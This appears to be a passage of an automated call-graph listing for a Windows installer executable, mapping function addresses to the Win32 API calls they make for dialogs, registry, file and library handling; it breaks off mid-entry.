6356->6386 6357 404298 6359 40436a 6357->6359 6360 4042a2 GetDlgItem 6357->6360 6366 403d6b 19 API calls 6358->6366 6367 403df6 8 API calls 6359->6367 6363 40432b 6360->6363 6364 4042bc 6360->6364 6362->6357 6362->6359 6365 404267 GetDlgItem SendMessageW 6362->6365 6363->6359 6369 40433d 6363->6369 6364->6363 6368 4042e2 6 API calls 6364->6368 6391 403db1 EnableWindow 6365->6391 6371 40417a 6366->6371 6376 404365 6367->6376 6368->6363 6372 404353 6369->6372 6373 404343 SendMessageW 6369->6373 6375 403d6b 19 API calls 6371->6375 6372->6376 6377 404359 SendMessageW 6372->6377 6373->6372 6374 404293 6378 403d8d SendMessageW 6374->6378 6379 404187 CheckDlgButton 6375->6379 6377->6376 6378->6357 6389 403db1 EnableWindow 6379->6389 6381 4041a5 GetDlgItem 6390 403dc4 SendMessageW 6381->6390 6383 4041bb SendMessageW 6384 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 6383->6384 6385 4041d8 GetSysColor 6383->6385 6384->6376 6385->6384 6387 404033 6386->6387 6388 404015 GlobalAlloc WideCharToMultiByte 6386->6388 6387->6358 6388->6387 6389->6381 6390->6383 6391->6374 6392 402ae4 6393 4030e3 6392->6393 6394 402aeb 6392->6394 6395 402af2 CloseHandle 6394->6395 6395->6393 5904 402065 5905 401446 18 API calls 5904->5905 5906 40206d 5905->5906 5907 401446 18 API calls 5906->5907 5908 402076 GetDlgItem 5907->5908 5909 4030dc 5908->5909 5910 4030e3 5909->5910 5912 405f7d wsprintfW 5909->5912 5912->5910 5913 402665 5914 40145c 18 API calls 5913->5914 5915 40266b 5914->5915 5916 40145c 18 API calls 5915->5916 5917 402674 5916->5917 5918 40145c 18 API calls 5917->5918 5919 40267d 5918->5919 5920 4062cf 11 API calls 5919->5920 5921 40268c 5920->5921 5922 406301 2 API calls 5921->5922 5923 402695 5922->5923 5924 4026a6 lstrlenW lstrlenW 5923->5924 5926 404f9e 25 API calls 5923->5926 5928 4030e3 5923->5928 5925 404f9e 25 API calls 5924->5925 5927 4026e8 SHFileOperationW 5925->5927 5926->5923 5927->5923 5927->5928 6396 6ffb1c5c 6397 6ffb1c14 4 API calls 6396->6397 6398 
6ffb1c63 6397->6398 5929 401c69 5930 40145c 18 API calls 5929->5930 5931 401c70 5930->5931 5932 4062cf 11 API calls 5931->5932 5933 401c80 5932->5933 5934 405ccc MessageBoxIndirectW 5933->5934 5935 401a13 5934->5935 5936 6ffb1bd7 5937 6ffb2025 2 API calls 5936->5937 5938 6ffb1bdd 5937->5938 5939 6ffb2025 2 API calls 5938->5939 5940 6ffb1be4 5939->5940 5941 6ffb1bff 5940->5941 5942 6ffb1bec SetTimer 5940->5942 5942->5941 5943 402f6e 5944 402f72 5943->5944 5945 402fae 5943->5945 5947 4062cf 11 API calls 5944->5947 5946 40145c 18 API calls 5945->5946 5951 402f9d 5946->5951 5948 402f7d 5947->5948 5949 4062cf 11 API calls 5948->5949 5950 402f90 5949->5950 5952 402fa2 5950->5952 5953 402f98 5950->5953 5955 406113 9 API calls 5952->5955 5954 403ea0 5 API calls 5953->5954 5954->5951 5955->5951 5396 4023f0 5397 402403 5396->5397 5398 4024da 5396->5398 5399 40145c 18 API calls 5397->5399 5400 404f9e 25 API calls 5398->5400 5401 40240a 5399->5401 5404 4024f1 5400->5404 5402 40145c 18 API calls 5401->5402 5403 402413 5402->5403 5405 402429 LoadLibraryExW 5403->5405 5406 40241b GetModuleHandleW 5403->5406 5407 40243e 5405->5407 5408 4024ce 5405->5408 5406->5405 5406->5407 5422 406391 GlobalAlloc WideCharToMultiByte 5407->5422 5410 404f9e 25 API calls 5408->5410 5410->5398 5411 402449 5412 40248c 5411->5412 5413 40244f 5411->5413 5414 404f9e 25 API calls 5412->5414 5415 402457 5413->5415 5416 40246e KiUserCallbackDispatcher 5413->5416 5418 402496 5414->5418 5425 401435 5415->5425 5417 40245f 5416->5417 5417->5404 5421 4024c0 FreeLibrary 5417->5421 5420 4062cf 11 API calls 5418->5420 5420->5417 5421->5404 5423 4063c9 GlobalFree 5422->5423 5424 4063bc GetProcAddress 5422->5424 5423->5411 5424->5423 5426 404f9e 25 API calls 5425->5426 5427 401443 5426->5427 5427->5417 5672 402175 5673 401446 18 API calls 5672->5673 5674 40217c 5673->5674 5675 401446 18 API calls 5674->5675 5676 402186 5675->5676 5677 402197 5676->5677 5678 4062cf 11 API calls 5676->5678 5679 4021aa EnableWindow 
5677->5679 5680 40219f ShowWindow 5677->5680 5678->5677 5681 4030e3 5679->5681 5680->5681 5682 6e9e2728 5683 6e9e2738 VirtualProtect 5682->5683 5684 6e9e2773 5682->5684 5683->5684 6406 4048f8 6407 404906 6406->6407 6408 40491d 6406->6408 6409 40490c 6407->6409 6424 404986 6407->6424 6410 40492b IsWindowVisible 6408->6410 6416 404942 6408->6416 6411 403ddb SendMessageW 6409->6411 6413 404938 6410->6413 6410->6424 6414 404916 6411->6414 6412 40498c CallWindowProcW 6412->6414 6425 40487a SendMessageW 6413->6425 6416->6412 6430 406035 lstrcpynW 6416->6430 6418 404971 6431 405f7d wsprintfW 6418->6431 6420 404978 6421 40141d 80 API calls 6420->6421 6422 40497f 6421->6422 6432 406035 lstrcpynW 6422->6432 6424->6412 6426 4048d7 SendMessageW 6425->6426 6427 40489d GetMessagePos ScreenToClient SendMessageW 6425->6427 6429 4048cf 6426->6429 6428 4048d4 6427->6428 6427->6429 6428->6426 6429->6416 6430->6418 6431->6420 6432->6424 6433 6e9e1427 6434 6e9e143f 6433->6434 6435 6e9e18df 2 API calls 6434->6435 6436 6e9e145a 6435->6436 6437 4050f9 6438 4052c1 6437->6438 6439 40511a GetDlgItem GetDlgItem GetDlgItem 6437->6439 6441 4052f2 6438->6441 6442 4052ca GetDlgItem CreateThread CloseHandle 6438->6442 6486 403dc4 SendMessageW 6439->6486 6444 405320 6441->6444 6445 405342 6441->6445 6446 40530c ShowWindow ShowWindow 6441->6446 6442->6441 6443 40518e 6452 406831 18 API calls 6443->6452 6447 40537e 6444->6447 6450 405331 6444->6450 6451 405357 ShowWindow 6444->6451 6448 403df6 8 API calls 6445->6448 6488 403dc4 SendMessageW 6446->6488 6447->6445 6455 405389 SendMessageW 6447->6455 6461 4052ba 6448->6461 6456 403d44 SendMessageW 6450->6456 6453 405377 6451->6453 6454 405369 6451->6454 6457 4051ad 6452->6457 6459 403d44 SendMessageW 6453->6459 6458 404f9e 25 API calls 6454->6458 6460 4053a2 CreatePopupMenu 6455->6460 6455->6461 6456->6445 6462 4062cf 11 API calls 6457->6462 6458->6453 6459->6447 6463 406831 18 API calls 6460->6463 6464 4051b8 GetClientRect GetSystemMetrics SendMessageW 
SendMessageW 6462->6464 6465 4053b2 AppendMenuW 6463->6465 6466 405203 SendMessageW SendMessageW 6464->6466 6467 40521f 6464->6467 6468 4053c5 GetWindowRect 6465->6468 6469 4053d8 6465->6469 6466->6467 6471 405232 6467->6471 6472 405224 SendMessageW 6467->6472 6470 4053df TrackPopupMenu 6468->6470 6469->6470 6470->6461 6473 4053fd 6470->6473 6474 403d6b 19 API calls 6471->6474 6472->6471 6475 405419 SendMessageW 6473->6475 6476 405242 6474->6476 6475->6475 6477 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 6475->6477 6478 40524b ShowWindow 6476->6478 6479 40527f GetDlgItem SendMessageW 6476->6479 6480 40545b SendMessageW 6477->6480 6482 405261 ShowWindow 6478->6482 6483 40526e 6478->6483 6479->6461 6481 4052a2 SendMessageW SendMessageW 6479->6481 6480->6480 6484 405486 GlobalUnlock SetClipboardData CloseClipboard 6480->6484 6481->6461 6482->6483 6487 403dc4 SendMessageW 6483->6487 6484->6461 6486->6443 6487->6479 6488->6444 6489 4020f9 GetDC GetDeviceCaps 6490 401446 18 API calls 6489->6490 6491 402116 MulDiv 6490->6491 6492 401446 18 API calls 6491->6492 6493 40212c 6492->6493 6494 406831 18 API calls 6493->6494 6495 402165 CreateFontIndirectW 6494->6495 6496 4030dc 6495->6496 6498 4030e3 6496->6498 6499 405f7d wsprintfW 6496->6499 6499->6498 6500 4024fb 6501 40145c 18 API calls 6500->6501 6502 402502 6501->6502 6503 40145c 18 API calls 6502->6503 6504 40250c 6503->6504 6505 40145c 18 API calls 6504->6505 6506 402515 6505->6506 6507 40145c 18 API calls 6506->6507 6508 40251f 6507->6508 6509 40145c 18 API calls 6508->6509 6510 402529 6509->6510 6511 40253d 6510->6511 6512 40145c 18 API calls 6510->6512 6513 4062cf 11 API calls 6511->6513 6512->6511 6514 40256a CoCreateInstance 6513->6514 6515 40258c 6514->6515 6516 4026fc 6517 401ee4 6516->6517 6519 402708 6516->6519 6517->6516 6518 406831 18 API calls 6517->6518 6518->6517 5711 4019fd 5712 40145c 18 API calls 5711->5712 5713 401a04 5712->5713 5714 405eab 2 API calls 5713->5714 5715 401a0b 5714->5715 
6520 4022fd 6521 40145c 18 API calls 6520->6521 6522 402304 GetFileVersionInfoSizeW 6521->6522 6523 40232b GlobalAlloc 6522->6523 6525 4030e3 6522->6525 6524 40233f GetFileVersionInfoW 6523->6524 6523->6525 6526 402350 VerQueryValueW 6524->6526 6527 402381 GlobalFree 6524->6527 6526->6527 6528 402369 6526->6528 6527->6525 6533 405f7d wsprintfW 6528->6533 6531 402375 6534 405f7d wsprintfW 6531->6534 6533->6531 6534->6527 6535 402afd 6536 40145c 18 API calls 6535->6536 6537 402b04 6536->6537 6542 405e7c GetFileAttributesW CreateFileW 6537->6542 6539 402b10 6540 4030e3 6539->6540 6543 405f7d wsprintfW 6539->6543 6542->6539 6543->6540 6544 4029ff 6545 401553 19 API calls 6544->6545 6546 402a09 6545->6546 6547 40145c 18 API calls 6546->6547 6548 402a12 6547->6548 6549 402a1f RegQueryValueExW 6548->6549 6552 401a13 6548->6552 6550 4029e4 RegCloseKey 6549->6550 6551 402a3f 6549->6551 6550->6552 6551->6550 6555 405f7d wsprintfW 6551->6555 6555->6550 4656 401f80 4680 401446 4656->4680 4658 401f88 4659 401446 18 API calls 4658->4659 4660 401f93 4659->4660 4663 401fa3 4660->4663 4683 40145c 4660->4683 4662 401fb3 4665 402006 4662->4665 4666 401fbc 4662->4666 4663->4662 4664 40145c 18 API calls 4663->4664 4664->4662 4668 40145c 18 API calls 4665->4668 4667 401446 18 API calls 4666->4667 4669 401fc4 4667->4669 4670 40200d 4668->4670 4671 401446 18 API calls 4669->4671 4672 40145c 18 API calls 4670->4672 4673 401fce 4671->4673 4674 402016 FindWindowExW 4672->4674 4675 401ff6 SendMessageW 4673->4675 4676 401fd8 SendMessageTimeoutW 4673->4676 4678 402036 4674->4678 4675->4678 4676->4678 4677 4030e3 4678->4677 4688 405f7d wsprintfW 4678->4688 4689 406831 4680->4689 4682 401455 4682->4658 4684 406831 18 API calls 4683->4684 4685 401488 4684->4685 4686 401497 4685->4686 4687 406064 5 API calls 4685->4687 4686->4663 4687->4686 4688->4677 4703 40683e 4689->4703 4690 406aab 4691 406ac1 4690->4691 4723 406035 lstrcpynW 4690->4723 4691->4682 4693 4068ff GetVersion 4693->4703 4694 406a72 
lstrlenW 4694->4703 4697 406831 10 API calls 4697->4694 4699 40697e GetSystemDirectoryW 4699->4703 4700 406991 GetWindowsDirectoryW 4700->4703 4702 4069c5 SHGetSpecialFolderLocation 4702->4703 4706 4069dd SHGetPathFromIDListW CoTaskMemFree 4702->4706 4703->4690 4703->4693 4703->4694 4703->4697 4703->4699 4703->4700 4703->4702 4704 406831 10 API calls 4703->4704 4705 406a0b lstrcatW 4703->4705 4707 405eff RegOpenKeyExW 4703->4707 4712 405f7d wsprintfW 4703->4712 4713 406035 lstrcpynW 4703->4713 4714 406064 4703->4714 4704->4703 4705->4703 4706->4703 4708 405f33 RegQueryValueExW 4707->4708 4709 405f78 4707->4709 4710 405f55 RegCloseKey 4708->4710 4709->4703 4710->4709 4712->4703 4713->4703 4721 406071 4714->4721 4715 4060e7 4716 4060ed CharPrevW 4715->4716 4718 40610d 4715->4718 4716->4715 4717 4060da CharNextW 4717->4715 4717->4721 4718->4703 4720 4060c6 CharNextW 4720->4721 4721->4715 4721->4717 4721->4720 4722 4060d5 CharNextW 4721->4722 4724 405d32 4721->4724 4722->4717 4723->4691 4725 405d38 4724->4725 4726 405d4e 4725->4726 4727 405d3f CharNextW 4725->4727 4726->4721 4727->4725 5956 401000 5957 401037 BeginPaint GetClientRect 5956->5957 5958 40100c DefWindowProcW 5956->5958 5960 4010fc 5957->5960 5963 401182 5958->5963 5961 401073 CreateBrushIndirect FillRect DeleteObject 5960->5961 5962 401105 5960->5962 5961->5960 5964 401170 EndPaint 5962->5964 5965 40110b CreateFontIndirectW 5962->5965 5964->5963 5965->5964 5966 40111b 6 API calls 5965->5966 5966->5964 6556 402880 6557 402884 6556->6557 6558 40145c 18 API calls 6557->6558 6559 4028a7 6558->6559 6560 40145c 18 API calls 6559->6560 6561 4028b1 6560->6561 6562 4028ba RegCreateKeyExW 6561->6562 6563 4029ef 6562->6563 6564 4028e8 6562->6564 6565 402934 6564->6565 6567 40145c 18 API calls 6564->6567 6566 402963 6565->6566 6568 401446 18 API calls 6565->6568 6569 4029ae RegSetValueExW 6566->6569 6572 40337f 33 API calls 6566->6572 6570 4028fc lstrlenW 6567->6570 6571 402947 6568->6571 6575 4029c6 RegCloseKey 
6569->6575 6576 4029cb 6569->6576 6573 402918 6570->6573 6574 40292a 6570->6574 6578 4062cf 11 API calls 6571->6578 6579 40297b 6572->6579 6580 4062cf 11 API calls 6573->6580 6581 4062cf 11 API calls 6574->6581 6575->6563 6577 4062cf 11 API calls 6576->6577 6577->6575 6578->6566 6587 406250 6579->6587 6584 402922 6580->6584 6581->6565 6584->6569 6586 4062cf 11 API calls 6586->6584 6588 406273 6587->6588 6589 4062b6 6588->6589 6590 406288 wsprintfW 6588->6590 6591 402991 6589->6591 6592 4062bf lstrcatW 6589->6592 6590->6589 6590->6590 6591->6586 6592->6591 5967 403d02 5968 403d0d 5967->5968 5969 403d11 5968->5969 5970 403d14 GlobalAlloc 5968->5970 5970->5969 6593 402082 6594 401446 18 API calls 6593->6594 6595 402093 SetWindowLongW 6594->6595 6596 4030e3 6595->6596 6597 402a84 6598 401553 19 API calls 6597->6598 6599 402a8e 6598->6599 6600 401446 18 API calls 6599->6600 6601 402a98 6600->6601 6602 402ab2 RegEnumKeyW 6601->6602 6603 402abe RegEnumValueW 6601->6603 6604 401a13 6601->6604 6605 402a7e 6602->6605 6603->6604 6603->6605 6605->6604 6606 4029e4 RegCloseKey 6605->6606 6606->6604 5971 6ffb14b2 5972 6ffb13f8 GetPropW 5971->5972 5973 6ffb14bd 5972->5973 5974 6ffb14f8 5973->5974 5975 6ffb14e0 CallWindowProcW 5973->5975 5976 6ffb14c7 LoadCursorW SetCursor 5973->5976 5975->5974 5976->5974 6607 402c8a 6608 402ca2 6607->6608 6609 402c8f 6607->6609 6611 40145c 18 API calls 6608->6611 6610 401446 18 API calls 6609->6610 6613 402c97 6610->6613 6612 402ca9 lstrlenW 6611->6612 6612->6613 6614 401a13 6613->6614 6615 402ccb WriteFile 6613->6615 6615->6614 6616 401d8e 6617 40145c 18 API calls 6616->6617 6618 401d95 ExpandEnvironmentStringsW 6617->6618 6619 401da8 6618->6619 6621 401db9 6618->6621 6620 401dad lstrcmpW 6619->6620 6619->6621 6620->6621 5977 401e0f 5978 401446 18 API calls 5977->5978 5979 401e17 5978->5979 5980 401446 18 API calls 5979->5980 5981 401e21 5980->5981 5982 4030e3 5981->5982 5984 405f7d wsprintfW 5981->5984 5984->5982 6622 40438f 6623 4043c8 
6622->6623 6624 40439f 6622->6624 6626 403df6 8 API calls 6623->6626 6625 403d6b 19 API calls 6624->6625 6627 4043ac SetDlgItemTextW 6625->6627 6628 4043d4 6626->6628 6627->6623 6629 403f90 6630 403fa0 6629->6630 6631 403fbc 6629->6631 6640 405cb0 GetDlgItemTextW 6630->6640 6632 403fc2 SHGetPathFromIDListW 6631->6632 6633 403fef 6631->6633 6635 403fd2 6632->6635 6639 403fd9 SendMessageW 6632->6639 6637 40141d 80 API calls 6635->6637 6636 403fad SendMessageW 6636->6631 6637->6639 6639->6633 6640->6636 5490 6e9e2a4f 5491 6e9e2a7f 5490->5491 5532 6e9e1c1b 5491->5532 5493 6e9e2a86 5494 6e9e2b9c 5493->5494 5495 6e9e2a9e 5493->5495 5496 6e9e2a97 5493->5496 5573 6e9e28a3 5495->5573 5592 6e9e23c1 5496->5592 5501 6e9e2ae4 5605 6e9e2445 5501->5605 5502 6e9e2b02 5505 6e9e2b08 5502->5505 5506 6e9e2b44 5502->5506 5503 6e9e2acd 5515 6e9e2ac3 5503->5515 5602 6e9e1507 5503->5602 5504 6e9e2ab4 5508 6e9e2aba 5504->5508 5514 6e9e2ac5 5504->5514 5510 6e9e1904 2 API calls 5505->5510 5512 6e9e2445 10 API calls 5506->5512 5508->5515 5586 6e9e124c 5508->5586 5517 6e9e2b1e 5510->5517 5523 6e9e2b36 5512->5523 5596 6e9e25b2 5514->5596 5515->5501 5515->5502 5520 6e9e2445 10 API calls 5517->5520 5519 6e9e2acb 5519->5515 5520->5523 5531 6e9e2b8b 5523->5531 5625 6e9e240b 5523->5625 5525 6e9e2b95 GlobalFree 5525->5494 5528 6e9e2b77 5528->5531 5629 6e9e1880 5528->5629 5529 6e9e2b70 FreeLibrary 5529->5528 5531->5494 5531->5525 5633 6e9e1581 GlobalAlloc 5532->5633 5534 6e9e1c3f 5634 6e9e1581 GlobalAlloc 5534->5634 5536 6e9e1c4a 5635 6e9e15a3 5536->5635 5538 6e9e1e60 GlobalFree GlobalFree GlobalFree 5539 6e9e1e7d 5538->5539 5556 6e9e1ec7 5538->5556 5544 6e9e21ad 5539->5544 5552 6e9e1e99 5539->5552 5539->5556 5540 6e9e1d04 GlobalAlloc 5565 6e9e1c52 5540->5565 5541 6e9e21ed GetModuleHandleW 5542 6e9e21fe LoadLibraryW 5541->5542 5543 6e9e220f lstrcmpiW 5541->5543 5542->5543 5542->5556 5547 6e9e222d 5543->5547 5548 6e9e2221 lstrcmpiW 5543->5548 5544->5541 5544->5556 5545 6e9e1d55 lstrcpyW 5549 6e9e1d5f 
lstrcpyW 5545->5549 5546 6e9e1d7a GlobalFree 5546->5565 5550 6e9e2296 5547->5550 5557 6e9e2257 lstrlenW 5547->5557 5548->5547 5548->5550 5549->5565 5647 6e9e194f WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5550->5647 5552->5556 5642 6e9e1592 5552->5642 5553 6e9e22a8 5555 6e9e22b8 lstrcpyW lstrcatW 5553->5555 5553->5556 5648 6e9e194f WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5555->5648 5556->5493 5563 6e9e2264 5557->5563 5564 6e9e2282 5557->5564 5560 6e9e216c lstrcpyW 5560->5565 5561 6e9e1dbc 5561->5565 5640 6e9e18df GlobalSize GlobalAlloc 5561->5640 5562 6e9e2019 GlobalFree 5562->5565 5563->5564 5572 6e9e2276 lstrcatW 5563->5572 5646 6e9e194f WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5564->5646 5565->5538 5565->5540 5565->5545 5565->5546 5565->5549 5565->5560 5565->5561 5565->5562 5569 6e9e1592 2 API calls 5565->5569 5645 6e9e1581 GlobalAlloc 5565->5645 5567 6e9e22f2 5567->5556 5571 6e9e2302 lstrcatW 5567->5571 5569->5565 5570 6e9e228e 5570->5556 5571->5556 5572->5564 5580 6e9e28bb 5573->5580 5574 6e9e1592 2 API calls 5574->5580 5575 6e9e15a3 3 API calls 5575->5580 5577 6e9e2a18 GlobalFree 5578 6e9e2a49 5577->5578 5577->5580 5578->5503 5578->5504 5578->5515 5579 6e9e29d0 GlobalAlloc WideCharToMultiByte 5579->5580 5580->5574 5580->5575 5580->5577 5580->5579 5581 6e9e297b GlobalAlloc lstrcpynW 5580->5581 5582 6e9e2957 lstrlenW 5580->5582 5651 6e9e1628 5580->5651 5581->5580 5583 6e9e29b0 GlobalAlloc CLSIDFromString GlobalFree 5581->5583 5582->5577 5585 6e9e2966 5582->5585 5583->5577 5585->5577 5656 6e9e2554 5585->5656 5589 6e9e125e 5586->5589 5587 6e9e1303 LoadImageW 5588 6e9e1321 5587->5588 5590 6e9e141d 5588->5590 5591 6e9e1412 GetLastError 5588->5591 5589->5587 5590->5515 5591->5590 5593 6e9e2407 5592->5593 5594 6e9e23d1 5592->5594 5593->5495 5594->5593 5595 6e9e23e3 GlobalAlloc 5594->5595 5595->5594 5597 6e9e25cd 5596->5597 5598 6e9e261f 5597->5598 5599 
6e9e260c GlobalAlloc 5597->5599 5600 6e9e2625 GlobalSize 5598->5600 5601 6e9e262f 5598->5601 5599->5601 5600->5601 5601->5519 5603 6e9e1512 5602->5603 5604 6e9e1552 GlobalFree 5603->5604 5609 6e9e245e 5605->5609 5607 6e9e24f3 lstrcpyW 5607->5609 5608 6e9e24bf MultiByteToWideChar 5608->5609 5609->5607 5609->5608 5610 6e9e2515 GlobalFree 5609->5610 5611 6e9e253e GlobalFree 5609->5611 5613 6e9e24a1 lstrcpynW 5609->5613 5614 6e9e2490 StringFromGUID2 5609->5614 5615 6e9e15e0 2 API calls 5609->5615 5659 6e9e1581 GlobalAlloc 5609->5659 5660 6e9e164f 5609->5660 5610->5609 5611->5609 5612 6e9e254f 5611->5612 5617 6e9e1904 5612->5617 5613->5609 5614->5609 5615->5609 5664 6e9e1581 GlobalAlloc 5617->5664 5619 6e9e190a 5620 6e9e1928 lstrcpyW 5619->5620 5621 6e9e1931 5619->5621 5620->5621 5622 6e9e15e0 5621->5622 5623 6e9e15e9 GlobalAlloc lstrcpynW 5622->5623 5624 6e9e1623 GlobalFree 5622->5624 5623->5624 5624->5523 5626 6e9e241a 5625->5626 5627 6e9e2442 5625->5627 5626->5627 5628 6e9e2432 GlobalFree 5626->5628 5627->5528 5627->5529 5628->5626 5630 6e9e189e 5629->5630 5631 6e9e15e0 2 API calls 5630->5631 5632 6e9e18aa 5631->5632 5632->5531 5633->5534 5634->5536 5636 6e9e15ac 5635->5636 5637 6e9e15dd 5635->5637 5636->5637 5649 6e9e1581 GlobalAlloc 5636->5649 5637->5565 5639 6e9e15ba lstrcpyW GlobalFree 5639->5565 5641 6e9e18fd 5640->5641 5641->5561 5650 6e9e1581 GlobalAlloc 5642->5650 5644 6e9e159b lstrcpyW 5644->5556 5645->5565 5646->5570 5647->5553 5648->5567 5649->5639 5650->5644 5652 6e9e162f 5651->5652 5653 6e9e164a 5651->5653 5654 6e9e1592 2 API calls 5652->5654 5653->5653 5655 6e9e1648 5654->5655 5655->5580 5657 6e9e25aa 5656->5657 5658 6e9e2562 VirtualAlloc 5656->5658 5657->5585 5658->5657 5659->5609 5661 6e9e167a 5660->5661 5662 6e9e1658 5660->5662 5661->5609 5662->5661 5663 6e9e165e lstrcpyW 5662->5663 5663->5661 5664->5619 6641 402392 6642 40145c 18 API calls 6641->6642 6643 402399 6642->6643 6646 407224 6643->6646 6647 406efe 25 API calls 6646->6647 6648 407244 
6647->6648 6649 4023a7 6648->6649 6650 40724e lstrcpynW lstrcmpW 6648->6650 6651 407280 6650->6651 6652 407286 lstrcpynW 6650->6652 6651->6652 6652->6649 5985 402713 6000 406035 lstrcpynW 5985->6000 5987 40272c 6001 406035 lstrcpynW 5987->6001 5989 402738 5990 402743 5989->5990 5991 40145c 18 API calls 5989->5991 5992 402752 5990->5992 5993 40145c 18 API calls 5990->5993 5991->5990 5995 40145c 18 API calls 5992->5995 5997 402761 5992->5997 5993->5992 5994 40145c 18 API calls 5996 40276b 5994->5996 5995->5997 5998 4062cf 11 API calls 5996->5998 5997->5994 5999 40277f WritePrivateProfileStringW 5998->5999 6000->5987 6001->5989 6653 6ffb142d 6654 6ffb143b 6653->6654 6655 6ffb145a CallWindowProcW 6653->6655 6654->6655 6656 6ffb1456 6654->6656 6655->6656 6657 6ffb147a 6655->6657 6657->6656 6658 6ffb147e DestroyWindow GetProcessHeap HeapFree 6657->6658 6658->6656 6659 402797 6660 40145c 18 API calls 6659->6660 6661 4027ae 6660->6661 6662 40145c 18 API calls 6661->6662 6663 4027b7 6662->6663 6664 40145c 18 API calls 6663->6664 6665 4027c0 GetPrivateProfileStringW lstrcmpW 6664->6665 6666 401e9a 6667 40145c 18 API calls 6666->6667 6668 401ea1 6667->6668 6669 401446 18 API calls 6668->6669 6670 401eab wsprintfW 6669->6670 6671 6ffb1021 6672 6ffb1e34 2 API calls 6671->6672 6673 6ffb1053 6672->6673 6674 6ffb1057 6673->6674 6676 6ffb1e34 2 API calls 6673->6676 6675 6ffb1e83 2 API calls 6674->6675 6678 6ffb1061 6675->6678 6677 6ffb1074 6676->6677 6677->6674 6679 6ffb1078 SHBrowseForFolderW 6677->6679 6680 6ffb10cc SHGetPathFromIDListW 6679->6680 6681 6ffb10c0 6679->6681 6683 6ffb10de 6680->6683 6682 6ffb1e83 2 API calls 6681->6682 6684 6ffb10ca 6682->6684 6685 6ffb1e83 2 API calls 6683->6685 6686 6ffb10f1 CoTaskMemFree 6685->6686 6686->6684 5716 401a1f 5717 40145c 18 API calls 5716->5717 5718 401a26 5717->5718 5719 4062cf 11 API calls 5718->5719 5720 401a49 5719->5720 5721 401a64 5720->5721 5722 401a5c 5720->5722 5770 406035 lstrcpynW 5721->5770 5769 406035 lstrcpynW 5722->5769 
5725 401a62 5728 406064 5 API calls 5725->5728 5726 401a6f 5727 40674e 3 API calls 5726->5727 5729 401a75 lstrcatW 5727->5729 5762 401a81 5728->5762 5729->5725 5730 406301 2 API calls 5730->5762 5731 405e5c 2 API calls 5731->5762 5733 401a98 CompareFileTime 5733->5762 5734 401ba9 5735 404f9e 25 API calls 5734->5735 5737 401bb3 5735->5737 5736 401b5d 5739 404f9e 25 API calls 5736->5739 5740 40337f 33 API calls 5737->5740 5738 4062cf 11 API calls 5738->5762 5741 401b70 5739->5741 5742 401bc6 5740->5742 5745 4062cf 11 API calls 5741->5745 5744 4062cf 11 API calls 5742->5744 5743 406035 lstrcpynW 5743->5762 5746 401bda 5744->5746 5750 401b8b 5745->5750 5747 401be9 SetFileTime 5746->5747 5748 401bf8 CloseHandle 5746->5748 5747->5748 5748->5750 5751 401c09 5748->5751 5749 406831 18 API calls 5749->5762 5752 401c21 5751->5752 5753 401c0e 5751->5753 5755 406831 18 API calls 5752->5755 5754 406831 18 API calls 5753->5754 5757 401c16 lstrcatW 5754->5757 5758 401c29 5755->5758 5756 405ccc MessageBoxIndirectW 5756->5762 5757->5758 5759 4062cf 11 API calls 5758->5759 5760 401c34 5759->5760 5765 405ccc MessageBoxIndirectW 5760->5765 5761 401b50 5763 401b93 5761->5763 5764 401b53 5761->5764 5762->5730 5762->5731 5762->5733 5762->5734 5762->5736 5762->5738 5762->5743 5762->5749 5762->5756 5762->5761 5768 405e7c GetFileAttributesW CreateFileW 5762->5768 5767 4062cf 11 API calls 5763->5767 5766 4062cf 11 API calls 5764->5766 5765->5750 5766->5736 5767->5750 5768->5762 5769->5725 5770->5726 6687 6ffb1d24 6688 6ffb2025 2 API calls 6687->6688 6689 6ffb1d29 6688->6689 6690 40209f GetDlgItem GetClientRect 6691 40145c 18 API calls 6690->6691 6692 4020cf LoadImageW SendMessageW 6691->6692 6693 4030e3 6692->6693 6694 4020ed DeleteObject 6692->6694 6694->6693 6695 402b9f 6696 401446 18 API calls 6695->6696 6701 402ba7 6696->6701 6697 402c4a 6698 401446 18 API calls 6700 402c3d 6698->6700 6699 402bdf ReadFile 6699->6700 6699->6701 6700->6697 6700->6698 6707 402d17 ReadFile 6700->6707 
6701->6697 6701->6699 6701->6700 6702 402c06 MultiByteToWideChar 6701->6702 6703 402c3f 6701->6703 6704 402c4f 6701->6704 6702->6701 6702->6704 6708 405f7d wsprintfW 6703->6708 6704->6700 6706 402c6b SetFilePointer 6704->6706 6706->6700 6707->6700 6708->6697 6002 402b23 GlobalAlloc 6003 402b39 6002->6003 6004 402b4b 6002->6004 6005 401446 18 API calls 6003->6005 6006 40145c 18 API calls 6004->6006 6008 402b41 6005->6008 6007 402b52 WideCharToMultiByte lstrlenA 6006->6007 6007->6008 6009 402b93 6008->6009 6010 402b84 WriteFile 6008->6010 6010->6009 6011 402384 GlobalFree 6010->6011 6011->6009 6709 4040a3 6710 4040b0 lstrcpynW lstrlenW 6709->6710 6711 4040ad 6709->6711 6711->6710 4728 4054a5 4729 4055f9 4728->4729 4730 4054bd 4728->4730 4732 40564a 4729->4732 4733 40560a GetDlgItem GetDlgItem 4729->4733 4730->4729 4731 4054c9 4730->4731 4734 4054d4 SetWindowPos 4731->4734 4735 4054e7 4731->4735 4737 4056a4 4732->4737 4745 40139d 80 API calls 4732->4745 4736 403d6b 19 API calls 4733->4736 4734->4735 4739 405504 4735->4739 4740 4054ec ShowWindow 4735->4740 4741 405634 SetClassLongW 4736->4741 4761 4055f4 4737->4761 4799 403ddb 4737->4799 4742 405526 4739->4742 4743 40550c DestroyWindow 4739->4743 4740->4739 4744 40141d 80 API calls 4741->4744 4747 40552b SetWindowLongW 4742->4747 4748 40553c 4742->4748 4746 405929 4743->4746 4744->4732 4749 40567c 4745->4749 4756 405939 ShowWindow 4746->4756 4746->4761 4747->4761 4753 4055e5 4748->4753 4754 405548 GetDlgItem 4748->4754 4749->4737 4750 405680 SendMessageW 4749->4750 4750->4761 4751 40141d 80 API calls 4757 4056b6 4751->4757 4752 40590a DestroyWindow EndDialog 4752->4746 4819 403df6 4753->4819 4758 405578 4754->4758 4759 40555b SendMessageW IsWindowEnabled 4754->4759 4756->4761 4757->4751 4757->4752 4757->4761 4762 406831 18 API calls 4757->4762 4767 403d6b 19 